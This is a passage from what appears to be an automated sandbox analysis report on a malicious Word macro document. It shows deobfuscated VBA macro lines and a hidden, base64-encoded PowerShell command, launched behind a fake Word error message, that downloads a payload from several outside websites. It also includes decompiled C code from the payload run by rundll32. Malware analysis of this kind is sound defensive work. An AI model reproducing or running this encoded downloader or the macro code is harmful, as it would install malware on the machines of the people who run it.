AE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3gAC],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAn
Ij2hesgjee57d3s0
uVItICICB
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
anyPG
Close
YVZXECEHD

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
"CcDmClHsnCC"
"aqGiHISIbAoabV"
"nJJzFRjEWpRikxCD"
"]a""nw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
"syYTHJShrguhzb"
"TubioGUTLadgXbA"
"oLweAMoGsqVE"

Line	Instruction	Meta Information
263	Function Hrs2a1p95u19(Svk60sycz63sk)
264	Q491417n8n1 = Pg5minli2d3c9	Pg5minli2d3c9 executed
265	Goto uWZkeMFv
266	Dim zDsRaIBGF as Object
267	Set ViWsSIH = sreXHFD	sreXHFD
268	Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
269	Dim uWZkeMFv as Object
270	Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	CreateTextFile
271	uWZkeMFv.WriteLine "CcDmClHsnCC"	WriteLine
272	uWZkeMFv.WriteLine "aqGiHISIbAoabV"	WriteLine
273	uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"	WriteLine
274	Set QOrvJEB = eCIzUDyJ	eCIzUDyJ
275	uWZkeMFv.Close	Close
276	Set zDsRaIBGF = Nothing
277	Set UskmBJF = yJmmmVIAG	yJmmmVIAG
278	Set uWZkeMFv = Nothing
278	uWZkeMFv:
280	Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Ij2hesgjee57d3s0 executed
281	Goto iHKuDmaEr
282	Dim OMZxxg as Object
283	Set drZcHkCm = uVItICICB	uVItICICB
284	Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
285	Dim iHKuDmaEr as Object
286	Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	CreateTextFile
287	iHKuDmaEr.WriteLine "syYTHJShrguhzb"	WriteLine
288	iHKuDmaEr.WriteLine "TubioGUTLadgXbA"	WriteLine
289	iHKuDmaEr.WriteLine "oLweAMoGsqVE"	WriteLine
290	Set noebIvSiu = anyPG	anyPG
291	iHKuDmaEr.Close	Close
292	Set OMZxxg = Nothing
293	Set NXbmIuHX = YVZXECEHD	YVZXECEHD
294	Set iHKuDmaEr = Nothing
294	iHKuDmaEr:
296	End Function

Module: Zdjtk46nm17voo

Declaration

Line	Content
1	Attribute VB_Name = "Zdjtk46nm17voo"

Reset < >

Analysis Process: powershell.exe PID: 1228 Parent PID: 2424 powershell.exeCOMMON

Executed Functions

Function 000007FF002508F2, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2118223625.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5417551d5fccd3996ca5a2758358c6a60bf06a6104a0332220d962bea412d951
Instruction ID: ca6e354a0e571e49c9ce85d8a9708228b76b150e398a9f5bc574deefee66f668
Opcode Fuzzy Hash: 5417551d5fccd3996ca5a2758358c6a60bf06a6104a0332220d962bea412d951
Instruction Fuzzy Hash: 3E11C26091F7C24FEB439B3858A56547FB0AF57215B1A48EBC085CF1B3D96C9849C722

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF0025249A, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2118223625.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88122fecbe59c50ec0f4e68548b2ea9b456078b28cbaa5ca01a151274dfcad93
Instruction ID: c50d6819e00e2fb968647ee04129a67bfc05f6d4a368f6399e0b8b4c9d556649
Opcode Fuzzy Hash: 88122fecbe59c50ec0f4e68548b2ea9b456078b28cbaa5ca01a151274dfcad93
Instruction Fuzzy Hash: 8EE0D810B1DC0B4FFF946A6C680A3B477C1E755313F6000B6E80CC22D3DD29E9448381

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2328 Parent PID: 2528 rundll32.exeCOMMON

Executed Functions

Function 00232C63, Relevance: 56.1, Strings: 44, Instructions: 1125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00232C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
